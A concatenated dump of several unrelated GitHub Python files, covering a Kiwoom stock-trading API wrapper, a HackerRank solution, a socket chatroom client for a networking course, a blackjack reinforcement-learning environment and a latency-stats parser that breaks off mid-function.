[self._get_comm_data(trcode, 'OPTKWFID', idx, '주식수')]\n # add['호가시간'] = [self._get_comm_data(trcode, 'OPTKWFID', idx, '호가시간')]\n # add['일자'] = [self._get_comm_data(trcode, 'OPTKWFID', idx, '일자')]\n # add['우선매도잔량'] = 
[self._get_comm_data(trcode, 'OPTKWFID', idx, '우선매도잔량')]\n # add['우선매수잔량'] = [self._get_comm_data(trcode, 'OPTKWFID', idx, '우선매수잔량')]\n # add['우선매도건수'] = [self._get_comm_data(trcode, 'OPTKWFID', idx, '우선매도건수')]\n # add['우선매수건수'] = [self._get_comm_data(trcode, 'OPTKWFID', idx, '우선매수건수')]\n # add['총매도잔량'] = [self._get_comm_data(trcode, 'OPTKWFID', idx, '총매도잔량')]\n # add['총매수잔량'] = [self._get_comm_data(trcode, 'OPTKWFID', idx, '총매수잔량')]\n # add['총매도건수'] = [self._get_comm_data(trcode, 'OPTKWFID', idx, '총매도건수')]\n # add['총매수건수'] = [self._get_comm_data(trcode, 'OPTKWFID', idx, '총매수건수')]\n \n # for idx, key in enumerate(add.keys()):\n # if idx in [0, 1]:\n # continue\n # if idx in [6, 10, 11]:\n # add[key] = float(add[key][0])\n # add[key] = int(add[key][0])\n\n print('\\n\\n_optkwfid request received: \\n', add)\n \n # df_name, df = self._df_generator('관심종목', self.stockcode_non_realtime, add)\n # self._data_to_sql('관심종목', df_name+'.db', df)\n # print('\\n\\n_optkwfid request received:\\n', self.tr_data[df_name]) \n # self.tr_data[df_name] = pd.DataFrame()\n \n def _get_comm_data(self, trcode, rqname, idx, itemname):\n return self.dynamicCall('GetCommData(QString, QString, int, QSTring)', trcode, rqname, idx, itemname).strip()\n\n def request_daily_chart(self, stock, date, pricetype=1):\n '''\n stock: 주식종목명\n date: 일자 YYYYMMDD\n pricetype: 1.유상증자 2.무상증자 4.배당락 8.액면분할 16.액면병합 32.기업합병 64.감자 256.권리락\n '''\n stockcode = self.all_stocks[stock]\n self.stockcode_non_realtime = stockcode \n self.requesting_time_unit = '' \n self.set_input_value('종목코드', stockcode)\n self.set_input_value('기준일자', date)\n self.set_input_value('수정주가구분', pricetype)\n self.comm_rq_data('OPT10081', 'opt10081', 0, '0001')\n\n while self.remaining_data == True:\n time.sleep(TR_REQ_TIME_INTERVAL)\n self.set_input_value('종목코드', stockcode)\n self.set_input_value('기준일자', date)\n self.set_input_value('수정주가구분', pricetype)\n self.comm_rq_data('OPT10081', 'opt10081', 2, '0002')\n\n def request_minute_chart(self, stock, mintime=30, pricetype=1):\n '''\n stock: name of a stock\n mintime: one of 1, 3, 5, 10, 15, 30, 45, 60 \n pricetype: 1.유상증자 2.무상증자 4.배당락 8.액면분할 16.액면병합 32.기업합병 64.감자 256.권리락\n '''\n stockcode = self.all_stocks[stock]\n self.stockcode_non_realtime = stockcode \n self.requesting_time_unit = str(mintime)+'분'\n self.set_input_value('종목코드', stockcode)\n self.set_input_value('틱범위', mintime)\n self.set_input_value('수정주가구분', pricetype)\n self.comm_rq_data('OPT10080', 'opt10080', 0, '0003')\n\n while self.remaining_data == True:\n time.sleep(TR_REQ_TIME_INTERVAL)\n self.set_input_value('종목코드', stockcode)\n self.set_input_value('틱범위', mintime)\n self.set_input_value('수정주가구분', pricetype)\n self.comm_rq_data('OPT10080', 'opt10080', 2, '0004')\n \n def request_tick_chart(self, stock, ticktime=1, pricetype=1):\n '''\n stock: name of a stock\n ticktime: one of 1, 3, 5, 10, 30\n pricetype: 1.유상증자 2.무상증자 4.배당락 8.액면분할 16.액면병합 32.기업합병 64.감자 256.권리락\n '''\n stockcode = self.all_stocks[stock]\n self.stockcode_non_realtime = stockcode \n self.requesting_time_unit = str(ticktime)+'틱'\n self.set_input_value('종목코드', stockcode)\n self.set_input_value('틱범위', ticktime)\n self.set_input_value('수정주가구분', pricetype)\n self.comm_rq_data('OPT10079', 'opt10079', 0, '0003')\n\n while self.remaining_data == True:\n time.sleep(TR_REQ_TIME_INTERVAL)\n self.set_input_value('종목코드', stockcode)\n self.set_input_value('틱범위', ticktime)\n self.set_input_value('수정주가구분', pricetype)\n self.comm_rq_data('OPT10079', 'opt10079', 2, '0004')\n \n def request_mass_data(self, 
*stocklist, prenext=0):\n code_list = ''\n codecnt = len(stocklist)\n for idx, stock in enumerate(stocklist):\n if idx == 0:\n code_list += self.all_stocks[stock]\n else:\n code_list += ';'+self.all_stocks[stock] #CommKwRqData() receives multiple stock tickers as one string separated with ;\n print('\\n\\nRequesting the real time data of the following tickers: ', code_list)\n self.comm_kw_rq_data(code_list, prenext, codecnt, typeflag=0, rqname='OPTKWFID', scrno='0005')\n \n def request_real_data(self, codelist, fidlist, opttype='1', scrno='0100'): \n self.set_real_data(scrno, codelist, fidlist, opttype)\n \n def make_order(self, stock, price, qty, hogagb='00', ordertype=1, orderno=' '):\n '''\n stock: 주식이름\n price: 주문가격\n qty: 주문수량\n hogagb: 거래구분(혹은 호가구분) \n '00':'지정가', '03':'시장가', '05':'조건부지정가', '06':'최유리지정가', '07':'최우선지정가', '10':'지정가IOC', '13':'시장가IOC',\n '16':'최유리IOC', '20':'지정가FOK', '23':'시장가FOK', '26':'최유리FOK', '61':'장전시간외종가', '62':'시간외단일가매매', '81':'장후시간외종가'\n ordertype: 주문유형 1:신규매수(default), 2:신규매도 3:매수취소, 4:매도취소, 5:매수정정, 6:매도정정 \n orderno: 원주문번호. 신규주문에는 공백 입력, 정정/취소시 입력합니다. \n '''\n stockcode = self.all_stocks[stock]\n self.stockcode_non_realtime = stockcode\n print('\\nself.account_num, ordertype, stockcode, qty, price, hogagb, orderno:\\n', self.account_num, ordertype, stockcode, qty, price, hogagb, orderno)\n self.set_order('testuser', '0006', self.account_num, ordertype, stockcode, qty, price, hogagb, orderno)\n \n \napp = QApplication(sys.argv)\n\nkiwoom = Kiwoom()\n\ntype(kiwoom.account_num)\n\n\n# kiwoom.make_order('삼성전자', 61000, 1, '03')\n# kiwoom.request_minute_chart('삼성전자', 30)\nkiwoom.request_daily_chart('삼성전자', '20221123')\n# kiwoom.request_mass_data('삼성전자', 'NAVER', '컬러레이', '현대차', '카카오', 'LG에너지솔루션')\n\n# print(kiwoom.all_stocks)\n","repo_name":"codebummer/Kiwoom-Trading-Take-1","sub_path":"kiwoom2.4.py","file_name":"kiwoom2.4.py","file_ext":"py","file_size_in_byte":32385,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"62"} +{"seq_id":"35711255333","text":"#!/bin/python3\n\nimport math\nimport os\nimport random\nimport re\nimport sys\n\n# Complete the cavityMap function below.\ndef cavityMap(grid):\n #small grid cases, no cavities possible\n if(len(grid)<3):\n return grid\n\n grid = [[a for a in line] for line in grid]\n\n for i in range(1, len(grid)-1):\n for j in range(1, len(grid)-1):\n if(not checkSide(grid, (i, j), -1, 0)):\n continue\n if(not checkSide(grid, (i, j), 1, 0)):\n continue\n if(not checkSide(grid, (i, j), 0, 1)):\n continue\n if(not checkSide(grid, (i, j), 0, -1)):\n continue\n grid[i][j] = \"X\"\n\n print(grid)\n\n return [\"\".join(line) for line in grid]\n\ndef checkSide(arr, a, i_shift, j_shift):\n i = a[0]\n j = a[1]\n if(arr[i+i_shift][j+j_shift]!='X'):\n if(int(arr[i][j])>int(arr[i+i_shift][j+j_shift])):\n return True\n return False\n\n\n\n# print(dayOfProgrammer(2016))\n# print(dayOfProgrammer(2017))\n","repo_name":"Gendo90/HackerRank","sub_path":"Basic Algorithms/cavityMap.py","file_name":"cavityMap.py","file_ext":"py","file_size_in_byte":1017,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"62"} +{"seq_id":"18189978074","text":"#!/usr/bin/python\r\n# version=2020/12/16\r\nimport sys # to use the argv\r\nimport socket, select\r\nimport os\r\nimport queue # for the queue threading\r\nimport time\r\nimport datetime\r\n\r\nimport tty\r\nimport termios\r\nuser = \"\"\r\nstatus = \"\"\r\nchat_addr = ()\r\nowner_chat_addr = ()\r\n\r\n\"\"\"\r\nHow to use 
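# Spot check for cavityMap above: the grid ["1112", "1912", "1892", "1234"]
# yields ["1112", "1X12", "18X2", "1234"] - each 9 strictly exceeds its four
# neighbors, and border cells are never marked.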
NonBlockingConsole:\r\nwith NonBlockingConsole() as nbc:\r\n\twhile True:\r\n\t\tnbc.get_data() # to get the console input nonblockingly\r\n\"\"\"\r\nclass NonBlockingConsole(object):\r\n\t\r\n\tdef __enter__(self):\r\n\t\tself.old_settings = termios.tcgetattr(sys.stdin)\r\n\t\ttty.setcbreak(sys.stdin.fileno()) # sys.stdin.fileno() == 0 ( stdout == 1, stderr == 2)\r\n\t\treturn self\r\n\r\n\tdef __exit__(self, type, value, traceback):\r\n\t\ttermios.tcsetattr(sys.stdin, termios.TCSADRAIN, self.old_settings)\r\n\r\n\r\n\tdef get_data(self):\r\n\t\tif select.select([sys.stdin], [], [], 0) == ([sys.stdin], [], []):\r\n\t\t\treturn sys.stdin.read(1)\r\n\t\treturn False\r\n\r\n## struct structure\r\nclass log:\r\n\t#__slots__ = [name, time, content]\r\n\tdef __init__(self,**data):\r\n\t\tself.__dict__.update(data)\r\n\r\ndef create_chat(addr, owner):\r\n\r\n\t# to get the system time of hour and minutes\r\n\tdef get_time():\r\n\t\th_m = time.strftime(\"%H %M\", time.localtime())\r\n\t\th = h_m.split()[0]\r\n\t\tm = h_m.split()[1]\r\n\t\treturn h, m\r\n\t\t\r\n\tserver = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n\tserver.setblocking(0)\r\n\tserver.bind(addr)\r\n\tserver.listen(15) # at least 10 client\r\n\t\r\n\tinputs = [server]\r\n\toutputs = []\r\n\tmessage_queues = {}\t\r\n\tclients = []\r\n\tusers = {}\r\n\thistory = []\r\n\tif_owner_first = True\r\n\tclose_chatroom = False\r\n\t\r\n\t# print(\"Wait for connection... \")\r\n\twhile inputs:\r\n\t\treadable, writable, exceptional = select.select(\r\n\t\t\tinputs, outputs, inputs)\r\n\t\t## readable\r\n\t\tfor s in readable:\r\n\t\t\tif s is server:\r\n\t\t\t\tconn, addr = s.accept()\r\n\t\t\t\tconn.setblocking(0)\r\n\t\t\t\tinputs.append(conn)\r\n\t\t\t\tclients.append(conn)\r\n\t\t\t\tmessage_queues[conn] = queue.Queue()\r\n\t\t\t\t# welcome \r\n\t\t\t\twelcome = \"********************************\\n\"+\\\r\n\t\t\t\t\t\t\t\"** Welcome to the chatroom. 
**\\n\"+\\\r\n\t\t\t\t\t\t\t\"********************************\"\r\n\t\t\t\tif len(history) != 0:\r\n\t\t\t\t\tfor i in range(len(history)):\r\n\t\t\t\t\t\twelcome += \"\\n\" + history[i]\r\n\t\t\t\tmessage_queues[conn].put(welcome)\r\n\t\t\t\tif conn not in outputs:\r\n\t\t\t\t\toutputs.append(conn)\r\n\t\t\t\t\t\r\n\t\t\telse:\r\n\t\t\t\tdata = str(s.recv(1024), encoding='utf-8')\t\t\t\t\r\n\t\t\t\tif data:\r\n\t\t\t\t\t\r\n\t\t\t\t\tif \"leave-chatroom\" == data:\r\n\t\t\t\t\t\tif owner == users[s]:\r\n\t\t\t\t\t\t\tclose_chatroom = True\r\n\t\t\t\t\t\tmessage = \"Welcome back to BBS.\"\r\n\t\t\t\t\t\tmessage_queues[s].put(message)\r\n\t\t\t\t\t\tif s not in outputs:\r\n\t\t\t\t\t\t\toutputs.append(s)\r\n\t\t\t\t\t\r\n\t\t\t\t\telif \"detach\" == data and owner == users[s]:\r\n\t\t\t\t\t\tif s in outputs:\r\n\t\t\t\t\t\t\toutputs.remove(s)\r\n\t\t\t\t\t\tinputs.remove(s)\r\n\t\t\t\t\t\tif s in clients:\r\n\t\t\t\t\t\t\tclients.remove(s)\r\n\t\t\t\t\t\ts.close()\r\n\t\t\t\t\t\tdel message_queues[s]\r\n\t\t\r\n\t\t\t\t\telif \"sys\" in data:\r\n\t\t\t\t\t\tuser = data.split()[1]\r\n\t\t\t\t\t\tusers[s] = user\r\n\t\t\t\t\t\tif user==owner and if_owner_first==False:\r\n\t\t\t\t\t\t\tpass\r\n\t\t\t\t\t\telse:\r\n\t\t\t\t\t\t\thour, min = get_time()\r\n\t\t\t\t\t\t\tsys = \"sys[%s:%s]:%s join us.\"%(hour, min, user)\r\n\t\t\t\t\t\t\tfor client in clients:\r\n\t\t\t\t\t\t\t\tif client != s:\r\n\t\t\t\t\t\t\t\t\tmessage_queues[client].put(sys)\r\n\t\t\t\t\t\t\t\t\tif client not in outputs:\r\n\t\t\t\t\t\t\t\t\t\toutputs.append(client)\r\n\t\t\t\t\t\tif if_owner_first:\r\n\t\t\t\t\t\t\tif_owner_first = False\r\n\t\t\t\t\t\t\r\n\t\t\t\t\telse:\r\n\t\t\t\t\t\thour, min = get_time()\r\n\t\t\t\t\t\tmessage = \"%s[%s:%s]:%s\"%(users[s], hour, min, data)\r\n\t\t\t\t\t\tif len(history) < 3:\r\n\t\t\t\t\t\t\thistory.append(message)\r\n\t\t\t\t\t\telse:\r\n\t\t\t\t\t\t\tdel history[0]\r\n\t\t\t\t\t\t\thistory.append(message)\r\n\t\t\t\t\t\tfor client in clients:\r\n\t\t\t\t\t\t\tif client != s:\r\n\t\t\t\t\t\t\t\tmessage_queues[client].put(message)\r\n\t\t\t\t\t\t\t\tif client not in outputs:\r\n\t\t\t\t\t\t\t\t\toutputs.append(client)\r\n\t\t\t\t\t\t\t\t\t\r\n\t\t\t\t# no message receive\r\n\t\t\t\telse:\r\n\t\t\t\t\tif s in outputs:\r\n\t\t\t\t\t\toutputs.remove(s)\r\n\t\t\t\t\tinputs.remove(s)\r\n\t\t\t\t\ts.close()\r\n\t\t\t\t\tdel message_queues[s]\r\n\t\t\r\n\t\t## writable \r\n\t\tfor s in writable:\r\n\t\t\ttry:\r\n\t\t\t\tnext_msg = message_queues[s].get_nowait()\r\n\t\t\texcept queue.Empty:\r\n\t\t\t\toutputs.remove(s)\r\n\t\t\telse:\r\n\t\t\t\ts.sendall(next_msg.encode())\r\n\t\t\t\t\r\n\t\t\t\t## close the chatroom socket server\r\n\t\t\t\tif close_chatroom == True:\r\n\t\t\t\t\thour, min = get_time()\r\n\t\t\t\t\tsys = \"sys[%s:%s]:the chatroom is close.\\nWelcome back to BBS.\"%(hour, min)\r\n\t\t\t\t\tfor client in clients:\r\n\t\t\t\t\t\tif client != s:\r\n\t\t\t\t\t\t\tmessage_queues[client].put(sys)\r\n\t\t\t\t\t\t\tif client not in outputs:\r\n\t\t\t\t\t\t\t\toutputs.append(client)\r\n\t\t\t\t\tif s in outputs:\r\n\t\t\t\t\t\toutputs.remove(s)\r\n\t\t\t\t\tinputs.remove(s)\r\n\t\t\t\t\tif s in clients:\r\n\t\t\t\t\t\tclients.remove(s)\r\n\t\t\t\t\ts.close()\r\n\t\t\t\t\tdel message_queues[s]\r\n\t\t\t\t\tclose_chatroom = False\r\n\t\t\t\t\r\n\t\t\t\t## close the chatroom socket client connection\r\n\t\t\t\telif next_msg == \"Welcome back to BBS.\":\r\n\t\t\t\t\t# send the leave message\r\n\t\t\t\t\thour, min = get_time()\r\n\t\t\t\t\tsys = \"sys[%s:%s]:%s leave us.\"%(hour, min, 
users[s])\r\n\t\t\t\t\tfor client in clients:\r\n\t\t\t\t\t\tif client != s:\r\n\t\t\t\t\t\t\tmessage_queues[client].put(sys)\r\n\t\t\t\t\t\t\tif client not in outputs:\r\n\t\t\t\t\t\t\t\toutputs.append(client)\r\n\t\t\t\t\t# after sending leave message, cloes the connection\t\t\r\n\t\t\t\t\tif s in outputs:\r\n\t\t\t\t\t\toutputs.remove(s)\r\n\t\t\t\t\tinputs.remove(s)\r\n\t\t\t\t\tif s in clients:\r\n\t\t\t\t\t\tclients.remove(s)\r\n\t\t\t\t\ts.close()\r\n\t\t\t\t\tdel message_queues[s]\r\n\t\t\t\t\r\n\t\t\t\t## leave-chatroom the condition of non-owner\r\n\t\t\t\telif \"Welcome back to BBS.\" in next_msg:\r\n\t\t\t\t\tif s in outputs:\r\n\t\t\t\t\t\toutputs.remove(s)\r\n\t\t\t\t\tinputs.remove(s)\r\n\t\t\t\t\tif s in clients:\r\n\t\t\t\t\t\tclients.remove(s)\r\n\t\t\t\t\ts.close()\r\n\t\t\t\t\tdel message_queues[s]\r\n\r\n\t\t## exceptional\r\n\t\tfor s in exceptional:\r\n\t\t\tinputs.remove(s)\r\n\t\t\tif s in outputs:\r\n\t\t\t\toutputs.remove(s)\r\n\t\t\ts.close()\r\n\t\t\tdel message_queues[s]\r\n\t\t\t\r\ndef join_chatroom(addr, owner, if_wel):\r\n\tglobal user, status, chat_addr\r\n\tchat_s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n\tchat_s.connect(addr)\r\n\t# recv welcome\r\n\twel = str(chat_s.recv(1024), encoding='utf-8')\r\n\tif if_wel:\r\n\t\tprint(wel)\r\n\tchat_s.sendall((\"sys %s\"%user).encode())\r\n\tchat_s.setblocking(0)\t\r\n\tchat_s.settimeout(0.01)\r\n\t\r\n\tmsgs = \"\"\r\n\twith NonBlockingConsole() as nbc:\r\n\t\twhile True:\r\n\t\t\ttry:\r\n\t\t\t\tdata = str(chat_s.recv(1024), encoding='utf-8')\r\n\t\t\t\tprint(data)\r\n\t\t\t\tif \"Welcome back to BBS.\" in data:\r\n\t\t\t\t\tchat_s.close()\r\n\t\t\t\t\tbreak\r\n\t\t\texcept:\r\n\t\t\t\tpass\r\n\t\t\tmsg = nbc.get_data() # to get the console input nonblockingly\r\n\t\t\tif msg and ord(msg)==10:\r\n\t\t\t\t# print(\"ENTER\")\r\n\t\t\t\tif msgs == \"detach\" and owner:\r\n\t\t\t\t\tchat_s.sendall(msgs.encode())\r\n\t\t\t\t\tchat_s.close()\r\n\t\t\t\t\t# sys.stdout.write('\\n')\r\n\t\t\t\t\tprint(msgs)\r\n\t\t\t\t\tprint(\"Welcome back to BBS.\")\r\n\t\t\t\t\tmsgs=\"\"\r\n\t\t\t\t\tbreak\r\n\t\t\t\telif msgs == \"leave-chatroom\" and owner:\r\n\t\t\t\t\tstatus = \"close\"\r\n\t\t\t\t\tchat_s.sendall(msgs.encode())\r\n\t\t\t\t\t# sys.stdout.write('\\n')\r\n\t\t\t\t\tprint(msgs)\r\n\t\t\t\t\tmsgs=\"\"\r\n\t\t\t\telse:\r\n\t\t\t\t\t# msgs = user + \" \" + msgs\r\n\t\t\t\t\tchat_s.sendall(msgs.encode())\r\n\t\t\t\t\t# sys.stdout.write('\\n')\r\n\t\t\t\t\tprint(msgs)\r\n\t\t\t\t\tmsgs=\"\"\r\n\t\t\telif msg:\r\n\t\t\t\tmsgs += msg\r\n\r\ndef command(cmd, s, u, addr):\r\n\tglobal user, status, chat_addr, owner_chat_addr\r\n\t## hw1 command\r\n\t# udp\r\n\tif cmd == \"whoami\" or \"register\" in cmd:\r\n\t\ts.sendall(\"udp\".encode())\r\n\t\tu.sendto( cmd.encode(), addr)\r\n\t\tdata, _ = u.recvfrom(1024)\r\n\t\tprint(str(data, encoding='utf-8'))\r\n\t\t\r\n\t# tcp\r\n\telif \"login\" in cmd:\r\n\t\ts.sendall(cmd.encode())\r\n\t\tdata = str(s.recv(1024), encoding='utf-8')\r\n\t\tprint(data)\r\n\t\tif \"Welcome\" in data:\r\n\t\t\tcmd = cmd.split()\r\n\t\t\tuser = cmd[1].strip()\r\n\r\n\telif cmd == \"logout\":\r\n\t\ts.sendall(cmd.encode())\r\n\t\tdata = str(s.recv(1024), encoding='utf-8')\r\n\t\tprint(data)\r\n\t\tif \"Bye\" in data:\r\n\t\t\tuser = \"\"\r\n\t\t\r\n\telif cmd==\"list-user\":\r\n\t\ts.sendall(cmd.encode())\r\n\t\tdata = str(s.recv(1024), encoding='utf-8')\r\n\t\tprint(data)\r\n\r\n\t## hw2 command\r\n\telif \"create-board\" in cmd or \"create-post\" in cmd or \"list-board\" in cmd 
\\\r\n\t\tor \"list-post\" in cmd or \"read\" in cmd or \"delete-post\" in cmd or \"update-post\" in cmd \\\r\n\t\tor \"comment\" in cmd:\r\n\t\ts.sendall(cmd.encode())\r\n\t\tdata = str(s.recv(1024), encoding='utf-8')\r\n\t\tprint(data)\r\n\t\t\r\n\t## hw3 command\r\n\telif \"create-chatroom\" in cmd:\r\n\t\ts.sendall(cmd.encode())\r\n\t\tdata = str(s.recv(1024), encoding='utf-8')\r\n\t\tprint(data)\r\n\t\tstatus = \"open\"\r\n\t\tif \"start to create\" in data:\r\n\t\t\tcmd = cmd.split()\r\n\t\t\towner_chat_addr = (addr[0], int(cmd[1]))\r\n\t\t\tpid = os.fork()\r\n\t\t\tif pid == -1:\r\n\t\t\t\tsys.exit(\"fork error\")\r\n\t\t\telif pid == 0:\r\n\t\t\t\t# child process\r\n\t\t\t\tcreate_chat(owner_chat_addr, user)\r\n\t\t\telse:\r\n\t\t\t\ttime.sleep(0.01)\r\n\t\t\t\tjoin_chatroom(owner_chat_addr, True, True)\r\n\t\t\t\tif status == \"close\":\r\n\t\t\t\t\ts.sendall( \"leave-chatroom\".encode())\r\n\t\t\t\t\r\n\telif \"list-chatroom\" == cmd: # list-chatroom use udp to do\r\n\t\ts.sendall(\"udp\".encode())\r\n\t\tu.sendto( cmd.encode(), addr)\r\n\t\tdata, _ = u.recvfrom(1024)\r\n\t\tprint(str(data, encoding='utf-8'))\r\n\telif \"join-chatroom\" in cmd:\r\n\t\ts.sendall(cmd.encode())\r\n\t\tdata = str(s.recv(1024), encoding='utf-8')\r\n\t\tif data.find(\"addr\") == -1:\r\n\t\t\tprint(data)\r\n\t\telse:\r\n\t\t\tchat_addr = (data[data.find(\"addr\")+4:data.find(\"port\")].strip(),\\\r\n\t\t\t\tint(data[data.find(\"port\")+4:].strip()))\r\n\t\t\tjoin_chatroom(chat_addr, False, True)\r\n\t\t\t\r\n\telif \"attach\" == cmd:\r\n\t\tif user == \"\":\r\n\t\t\tprint(\"Please login first.\")\r\n\t\telif status == \"\":\r\n\t\t\tprint(\"Please create-chatroom first.\")\r\n\t\telif status == \"close\":\r\n\t\t\tprint(\"Please restart-chatroom first.\")\r\n\t\telse:\r\n\t\t\tprint(\"Welcome to the chatroom.\")\r\n\t\t\tjoin_chatroom(owner_chat_addr, True, True)\r\n\t\t\tif status == \"close\":\r\n\t\t\t\ts.sendall( \"leave-chatroom\".encode())\r\n\t\t\r\n\telif \"restart-chatroom\" == cmd:\r\n\t\ts.sendall(cmd.encode())\r\n\t\tdata = str(s.recv(1024), encoding='utf-8')\r\n\t\tprint(data)\r\n\t\tif data == \"start to create chatroom...\":\r\n\t\t\tstatus = \"open\"\r\n\t\t\tjoin_chatroom(owner_chat_addr, True, True)\r\n\t\t\tif status == \"close\":\r\n\t\t\t\ts.sendall( \"leave-chatroom\".encode())\r\n\t\t\r\nif __name__ == \"__main__\":\r\n\t## the host and service\r\n\tif len(sys.argv) != 3:\r\n\t\tsys.exit(\"iter_tcp_client.py {host} {portnumber}\")\r\n\telse:\r\n\t\tport = int(sys.argv[2])\r\n\t\thost = sys.argv[1]\r\n\taddr = (host, port)\r\n\r\n\ts = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n\tu = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\r\n\ts.connect(addr)\r\n\r\n\t# recv welcome\r\n\twel = str(s.recv(1024), encoding='utf-8')\r\n\tprint(wel)\r\n\t\r\n\twhile True:\r\n\t\tcmd = input(\"% \")\r\n\t\t# print(\"Test input: %s\" % cmd)\r\n\t\t\r\n\t\tif cmd==\"exit\":\r\n\t\t\ts.sendall(cmd.encode())\r\n\t\t\tbreak\r\n\t\telse:\r\n\t\t\tcommand(cmd, s, u, addr)\r\n\ts.close()\r\n\tu.close()","repo_name":"KJ-black/Introduce-Network-Programming","sub_path":"HW3/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":10240,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"62"} +{"seq_id":"7509927560","text":"import json\nd=dict(name='Bob',age=20,score=88)\nL=json.dumps(d)\nprint(L)\n\n# class Student(object):\n# def __init__(self,name,age,score):\n# self.name = name\n# self.age = age\n# self.score =score\n# def 
Student2dict(std):\n# return {\n# 'name':std.name,\n# 'age':std.age,\n# 'score':std.score\n# }\n# # dict(name=self.name,age=self.age,score=self.score)\n \n# s= Student('Bob',20,88)\n# print(json.dumps(s,default=lambda obj : obj.__dict__))\n\n","repo_name":"xiaoanya/python_base","sub_path":"json_.py","file_name":"json_.py","file_ext":"py","file_size_in_byte":531,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"62"} +{"seq_id":"13558494612","text":"import itertools\nimport random\n\nfrom tqdm import tqdm\n\nfrom blackjack.blackjack_state import BlackjackState, BustBlackjackState\nfrom blackjack.score_calculator import ScoreCalculator\nfrom blackjack.utility import log\n\nBUST = 'b'\nUSABLE_A = 'a'\nNO_USABLE_A = 'na'\n\n\nclass BlackjackEnvironment:\n def __init__(self, ):\n self.stats = {\n USABLE_A: list(self.create_state_list(True)),\n NO_USABLE_A: list(self.create_state_list(False)),\n BUST: BustBlackjackState()\n }\n self.current_stat = None\n self.state_gone_through = None\n self.start_state_new_episode()\n\n @staticmethod\n def create_state_list(have_usable_a):\n for i in range(1, 11):\n yield [BlackjackState(j, i, have_usable_a, name='dealer: {} --- player: {} ---- usable_a: {}'.format(i, j, have_usable_a)) for j in\n range(11, 22)]\n\n def monte_carlo_es(self):\n for _ in tqdm(range(500000)):\n reward = self.execute_one_episode()\n self.settle_reward(reward)\n self.start_state_new_episode()\n\n def execute_one_episode(self):\n log.debug('start')\n while True:\n log.debug(self.current_stat)\n is_end, reward = self.play()\n log.debug('reward={}'.format(reward))\n if is_end:\n log.debug('end')\n return reward\n # self.update_reward(reward)\n # break\n\n def play(self):\n action = self.current_stat.get_next_action()\n if action.is_stick():\n return True, self.current_stat.get_reward()\n else:\n self.update_next_state()\n return False, 0\n\n def update_next_state(self):\n self.current_stat = self._get_next_state(self.current_stat)\n self.go_through_state(self.current_stat)\n\n def go_through_state(self, state):\n self.state_gone_through.append(state)\n\n def _get_next_state(self, stat: BlackjackState):\n player_cards = stat.get_cards()\n player_cards.append(stat.hit())\n calculator = ScoreCalculator(player_cards)\n player_sum = calculator.calculate()\n return self._get_state(calculator.have_usable_a(), stat.dealer_show, player_sum)\n\n def _get_state(self, have_usable_a, dealer_show, player_sum):\n if player_sum > 21:\n return self.stats[BUST]\n if have_usable_a:\n return self.stats[USABLE_A][dealer_show - 1][player_sum - 11]\n return self.stats[NO_USABLE_A][dealer_show - 1][player_sum - 11]\n\n def update_reward(self, reward):\n log.debug('start update')\n for state in self.state_gone_through:\n state.update_reward(reward)\n log.debug(state)\n log.debug('end update')\n\n def start_state_new_episode(self):\n self.current_stat = self.new_random_state()\n self.state_gone_through = [self.current_stat]\n\n def new_random_state(self):\n stats = list(itertools.chain.from_iterable(self.stats[USABLE_A] + self.stats[NO_USABLE_A]))\n state = stats[random.randint(0, len(stats) - 1)]\n state.choose_random_policy()\n return state\n\n def settle_reward(self, reward):\n self.update_reward(reward)\n for state in self.state_gone_through:\n state.choose_next_policy()\n\n def print(self):\n self._print(self.stats[USABLE_A])\n self._print(self.stats[NO_USABLE_A])\n\n def _print(self, states):\n stats = list(itertools.chain.from_iterable(states))\n for state in 
stats:\n log.log(state)\n\n def get_result(self, flag):\n for dealer_show in self.stats[flag]:\n yield [player_sum.get_result() for player_sum in dealer_show]\n\n\n","repo_name":"boydfd/reinforcement_learning","sub_path":"src/blackjack/blackjack_environment.py","file_name":"blackjack_environment.py","file_ext":"py","file_size_in_byte":3739,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"62"} +{"seq_id":"28813584307","text":"import glob\nimport os\nimport numpy as np\nimport scipy\n\nfrom utils.plot import plot_reward\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nimport matplotlib\nfrom matplotlib.font_manager import FontProperties\n\ndef read_data(rootdir, qos, hotel=False):\n mean_cpu = {}\n max_cpu = {}\n\n tail_latencies = {}\n violation_rates = {}\n\n for _, dirs, _ in os.walk(rootdir):\n for subdir in sorted(dirs, key=lambda x: (len(x), x)):\n key = int(subdir)\n\n # get mean/max action\n action_file = os.path.join(rootdir, subdir, 'core_allocation_sum.txt')\n if not os.path.isfile(action_file): #compat with old naming\n action_file = os.path.join(rootdir, subdir, 'action_sum.txt')\n\n\n with open(action_file, 'r') as f:\n all_cpu_allocations = [float(x) for x in f.readline().strip().split(',') if x]\n\n mean_cpu[key] = np.mean(all_cpu_allocations)\n max_cpu[key] = np.max(all_cpu_allocations)\n\n # get violation rate\n single_exp_tail_latencies = []\n\n if hotel:\n name = 'hotel_stats_history.csv'\n else:\n name = 'social_stats_history.csv'\n \n with open(os.path.join(rootdir, subdir, name), 'r') as f:\n lines = f.readlines()\n assert len(lines) > 1\n fields = lines[0].split(',')\n\n # \"Timestamp\",\"User Count\",\"Type\",\"Name\",\"Requests/s\",\"Failures/s\",\"50%\",\"66%\",\"75%\",\"80%\",\"90%\",\"95%\",\"98%\",\"99%\",\"99.9%\",\"99.99%\",\"99.999%\",\"100%\",\"Total Request Count\",\"Total Failure Count\"\n pos = {}\n tail_key = '99%'\n pos[tail_key] = None\n for i, k in enumerate(fields):\n k = k.replace('\\\"', '').strip()\n if k == tail_key:\n pos[tail_key] = i\n\n # TODO: warmup is hard-coded here\n count = 0\n violations = 0\n\n beg = 61\n for line in lines[beg:]:\n data = line.strip().split(',')\n single_exp_tail_latencies.append(int(data[pos[tail_key]]))\n\n count += 1\n if single_exp_tail_latencies[-1] > qos:\n violations +=1\n \n print(np.std(single_exp_tail_latencies))\n tail_latencies[key] = np.mean(single_exp_tail_latencies)\n 